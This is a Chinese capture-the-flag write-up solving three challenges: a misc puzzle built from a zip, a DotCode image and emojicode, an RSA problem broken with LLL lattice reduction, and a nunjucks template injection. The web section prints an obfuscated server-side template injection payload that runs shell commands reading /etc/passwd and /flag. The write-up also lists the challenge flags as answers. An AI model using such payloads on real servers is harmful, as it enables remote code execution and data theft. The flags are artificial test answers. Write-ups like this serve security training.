公众号:Th0r安全
题目附件
链接:https://pan.baidu.com/s/1bM_E-YQh860qLycve6E70g
提取码:3i5d
附件中发现flag.ws文件,打开
得到一串ASC II HEX编码,发现文件头为50 4B 03 04,是一个压缩包
ASC II HEX编码:

另存为.zip文件,解压压缩包中包含flag.gif和flag.kge,其中flag.gif图片为DotCode点码,flag.kge文件类似于一个压缩文件,需要解压缩,首先因为扫面电码需要使用jpg、png等格式图片,不支持gif格式图片,所以先把flag.gif图片打开截图,另存为png文件,这里我命名为3.png文件
DotCode点码扫描发现一个密码:This_1s_Hard_P@ssW0rd
用所得密码解压flag.kge
解压出final.rar,解压压缩包发现hint.txt与math
hint中提示:这是什么奇怪的emoji呢,flag为结果的md5格式
打开math文件发现是emojicode语言
运行得到37 assertions, 0 failures
将37 assertions, 0 failures进行md5进行加密得到flag
18eebeda59edbb8afc6504212d9b1708
flag:flag{18eebeda59edbb8afc6504212d9b1708}
题目附件
链接:https://pan.baidu.com/s/14wcWXGtDtA2eNR-vbR-h7Q
提取码:x5nl
在所给task.py的源码中
hint = (p - 297498275426) * inverse(s, M) % M
得出p0的值p0 = 297498275426
利用gmpy2模块用模逆求得h1的值,得到
h1= 96361307638526160128275232841313826844825253068870980900934192188891510551420052345552431792479840438980000477458899377104553629313980434701061722776746604537972756291434818103501339060242294117305489313746479784401926856581436285111060916064426422616104984224389185617187382575258631277595163432669517076779164313529836341265351052669603987753134000273982701751258305714891009754111869632318339922612121337239009455303063744344834798308651538128933243085858944997945472610002759802142612514835718077873731968091710019124811531090599086059676394415056193222210488607339239570752828864267138070386119725611507153145264064061390481712176086722958938267217810289512805568430677928120025006715679793323534102684719000948071840711716648476639307642260959880060757482391207020902196173340664132826499971030443682705323615549253407885232533737927587133190099112645483759858542550066099656314147004339559010681909642127340010803924819122128891330286686873273289668833736208584661679470437076112164758330869531349356510586090151089546366597956881151997011986962460030937979416744244429250707330074647102546719487245812119325549500806109393926145505166836485460582131283456276288223155465522414627989969498582512812807635975649240934207329634168165165231132359387645858396415008828376353069515116729802664022095002695969419374362481090766414385459297200738185201674785282665665671978205341651386058872588580265151829725849613776783226935931727969686464702666484422309933642834256383703645425112833012951078243635322495925603732
利用sage求解得到p-p0的值
e = 65537
c = 11223534598141520071392544441952727165225232358333005778273904279807651365082135278999006409297342081157139972503703772556228315654837441044781410960887536342197257046095815516053582104516752168718754752274252871063410625756822861003235434929734796245933907621657696650609132419469456238860601166224944487116
n = 99499509473364452726944770421623721217675378717234178828554602484867641740497277374806036356486848621495917213623425604565104435195783450029879177770305417469850119739921527698744700219067563802483159458398895082044997907953256062342593605652927874232404778144112740505724215742062859322375891810785229735653
M = 28858066896535909755146975040720031655813099454455588895434479778600245612915775220883088811806723015938061791264869678085304248608125313205719043320256733514389739252845381708094678596099621503299764646358765107958130065721737938646850422959290465490270263553423913213684958592738500488797707239673645370968467090153285601432966586133693641854092761919184904521240074718850103356119966387029699913571443658384564840234765103070736676067458391659605655580766436276719610283460962533141261830775028138998594269732067550977245136631815804641115446066102981044849495663224005844657686979516481904043008222498344271373989609634617315702887646444506965035406154183377067490922195507071571055579654138590566650703038341939225657159668601565182939447340585110418258653618384852356058444795156595720943362884361136229430356254095673818462046182310826133487611183265532844700265640889105864909560170846171486510513240630480729194415061752698286990999064594811803482429976978688266632277914610443963726561921790718480343488391563503774868490108659902216386976683532579945706490286814310031310144410303859633785939399012605326754445715302492704458881700872467560968264583996658711892595658439058034434031646411995511168849724976850557976639662545139917517675296224197763447929417263845949813741362574641118781293171167041592771305352186419565096347024619027397784780864922205105185970180629777320680707022011697404359388540366320053501502698747763307336114482530784826238326983596966436776918503653153420281803168537703048371580451
hint = 24302462761412867722556483860201357169283131384498485449193507018526006760633350601593235386242712333885826513399701577522498685938541691414316724804357523659514319083860507720945068584985970098437482386854188516742033184163273293005356970701527614010961471490166306765208284126815267752826036846338185010168551115391901008731195800723630612524215610302192763771954146943262822909368086155537366851998954401585888789660061750804720858175620022924944428882337005545535959410243692854073069775794945154943244522898330286785483043492678802461244624116832548150221211726044545331789932659966539042635768789637635754297830131948383991027466194455817875377950516103513735000718642093769229006510961952865719649517629939801014585849419818774317178973918720330390674833583065434312010539617630210110724391629534996688713945139529416075521015600392479980677759342058040778532467875961508475990300178277703011765698425360329342396347848373844031930655143343217447877587074485794273364964346235973542157189093330870952677683308479410235841331914353677363106473914986073397716367455628483060709281215783434084559550690248426391913205234184130354155776334292729262232484610747771114078013979494659835579574006801652858265173309736540235377076956677464263798132149783780830729103485354096234062135454873557941791812722418582207577124971978987895472250326100927372068822672582017222521124179752698654114839303426099426224351872025466618402675104161895600513776962289703455252021742990686505176582638132300246212598903123706906104217087
p0=297498275426
h
a = [int(h1),1,0]
b = [int(-h1*p0)-2**511,-2**511,1]
c = [M,0,0]
aa = [a,b,c]
aa = matrix(aa)
print(aa.LLL())
[-67039039649712985497870124991029230637396829102961966888617807218608820150366813865347147128591903743287552540787250416376653571228423066642275206473429200418764077831781011262060959033360679044010508660871491788813950802409206578328800029311179193659383540501854717037220870513102928895129591772776500091]
[-9210186622243622426133951626067501451798378921158428313097830898930385569906 -870809160574961635989963310869325667053012301538280540377966886136890610710255677640123026087538830768042094764041339763558207243526223626913425476976760]

得到
p-p0= 8708091605749616359899633108693256670530123015382805403779668861368906107102556776401230260875388307680420947640413397635582072435262236269134254769767613
p=p0+上述所求值
from Crypto.Util.number import *
import gmpy2
e = 65537
c = 11223534598141520071392544441952727165225232358333005778273904279807651365082135278999006409297342081157139972503703772556228315654837441044781410960887536342197257046095815516053582104516752168718754752274252871063410625756822861003235434929734796245933907621657696650609132419469456238860601166224944487116
n = 99499509473364452726944770421623721217675378717234178828554602484867641740497277374806036356486848621495917213623425604565104435195783450029879177770305417469850119739921527698744700219067563802483159458398895082044997907953256062342593605652927874232404778144112740505724215742062859322375891810785229735653
M = 28858066896535909755146975040720031655813099454455588895434479778600245612915775220883088811806723015938061791264869678085304248608125313205719043320256733514389739252845381708094678596099621503299764646358765107958130065721737938646850422959290465490270263553423913213684958592738500488797707239673645370968467090153285601432966586133693641854092761919184904521240074718850103356119966387029699913571443658384564840234765103070736676067458391659605655580766436276719610283460962533141261830775028138998594269732067550977245136631815804641115446066102981044849495663224005844657686979516481904043008222498344271373989609634617315702887646444506965035406154183377067490922195507071571055579654138590566650703038341939225657159668601565182939447340585110418258653618384852356058444795156595720943362884361136229430356254095673818462046182310826133487611183265532844700265640889105864909560170846171486510513240630480729194415061752698286990999064594811803482429976978688266632277914610443963726561921790718480343488391563503774868490108659902216386976683532579945706490286814310031310144410303859633785939399012605326754445715302492704458881700872467560968264583996658711892595658439058034434031646411995511168849724976850557976639662545139917517675296224197763447929417263845949813741362574641118781293171167041592771305352186419565096347024619027397784780864922205105185970180629777320680707022011697404359388540366320053501502698747763307336114482530784826238326983596966436776918503653153420281803168537703048371580451
hint = 24302462761412867722556483860201357169283131384498485449193507018526006760633350601593235386242712333885826513399701577522498685938541691414316724804357523659514319083860507720945068584985970098437482386854188516742033184163273293005356970701527614010961471490166306765208284126815267752826036846338185010168551115391901008731195800723630612524215610302192763771954146943262822909368086155537366851998954401585888789660061750804720858175620022924944428882337005545535959410243692854073069775794945154943244522898330286785483043492678802461244624116832548150221211726044545331789932659966539042635768789637635754297830131948383991027466194455817875377950516103513735000718642093769229006510961952865719649517629939801014585849419818774317178973918720330390674833583065434312010539617630210110724391629534996688713945139529416075521015600392479980677759342058040778532467875961508475990300178277703011765698425360329342396347848373844031930655143343217447877587074485794273364964346235973542157189093330870952677683308479410235841331914353677363106473914986073397716367455628483060709281215783434084559550690248426391913205234184130354155776334292729262232484610747771114078013979494659835579574006801652858265173309736540235377076956677464263798132149783780830729103485354096234062135454873557941791812722418582207577124971978987895472250326100927372068822672582017222521124179752698654114839303426099426224351872025466618402675104161895600513776962289703455252021742990686505176582638132300246212598903123706906104217087
p0 = 297498275426
h1 = gmpy2.invert(hint,M)
p = 8708091605749616359899633108693256670530123015382805403779668861368906107102556776401230260875388307680420947640413397635582072435262236269134254769767613+p0
q = n // p
print q
phi = (p - 1)*(q - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print long_to_bytes(m)
运行得到p的值与flag
p=11426098159976724615129622580835312249207837035640883882207032306633739510654413328963253517206425808623042239326899717411126775267302638284556461931522427
flag{388bb794-ccda-f02e-79c6-8e44659c2481}
打报错发现nunjuck模板注入 ,百度第一条 https://www.sohu.com/a/109253536_120004
最后用的是这个exp改
{{range.constructor("returnglobal.process.mainModule.require('child_process').
execSync('tail/etc/passwd')")()}}
range没有,用"1"代替
exp:
{{""["const"+"ructor"]["const"+"ructor"]["const"+"ructor"]["const"+"ructor"]
("return(ev"+"al(String[\"fro\"+\"mCh\"+\"arC\"+\"ode\"]
(39,49,39,46,99,111,110,115,116,114,117,99,116,111,114,46,99,111,110,115,116,1
14,117,99,116,111,114,46,99,111,110,115,116,114,117,99,116,111,114,40,34,114,1
01,116,117,114,110,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,1
09,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,1
04,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,11
0,99,40,39,99,97,116,32,47,102,108,97,103,39,41,34,41,40,41)))")()}}